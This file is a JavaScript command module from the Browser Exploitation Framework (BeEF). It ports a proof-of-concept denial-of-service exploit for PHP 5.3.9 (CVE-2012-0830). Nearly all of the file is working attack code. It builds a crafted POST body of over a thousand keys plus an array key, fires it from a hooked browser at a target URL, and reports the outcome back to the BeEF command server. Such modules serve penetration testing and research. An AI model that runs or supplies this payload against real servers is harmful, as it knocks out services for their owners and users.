53 lines
1.5 KiB
JavaScript
53 lines
1.5 KiB
JavaScript
//
|
|
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function() {
|
|
|
|
// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830)
|
|
// PoC written by Paul Westin
|
|
// PoC ported to BeEF by bcoles
|
|
// Bug discovered by Stefan Esser (@i0n1c)
|
|
// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/
|
|
|
|
// Generate 1000 normal keys and one array
|
|
function createEvilObj () {
|
|
var evil_obj = {};
|
|
for (var i = 0; i < 1001; i++) {
|
|
evil_obj[i] = 1;
|
|
}
|
|
evil_obj['kill[]'] = 'kill';
|
|
return evil_obj;
|
|
}
|
|
|
|
// Serialize Javascript object into POST data
|
|
function serializeObj (obj) {
|
|
var str = [];
|
|
for(var p in obj) {
|
|
str.push(p + "=" + obj[p]);
|
|
}
|
|
return str.join("&");
|
|
}
|
|
|
|
// Run attack
|
|
function php_dos (target_url) {
|
|
var bad = serializeObj(createEvilObj());
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.open("POST", target_url, true);
|
|
xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
|
|
xhr.setRequestHeader('Content-Length', bad.length);
|
|
xhr.send(bad);
|
|
}
|
|
|
|
try {
|
|
php_dos("<%= @url %>");
|
|
beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
|
|
} catch (e) {
|
|
beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
|
|
}
|
|
|
|
});
|
|
|